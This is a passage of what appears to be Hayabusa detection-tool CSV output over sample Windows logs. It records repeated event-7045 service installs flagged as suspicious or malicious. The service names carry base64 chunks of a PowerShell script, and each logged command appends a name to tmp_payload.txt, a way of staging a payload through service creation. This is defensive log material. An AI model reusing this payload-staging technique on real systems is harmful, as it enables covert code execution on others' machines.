start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:58.646 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:05.897 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | 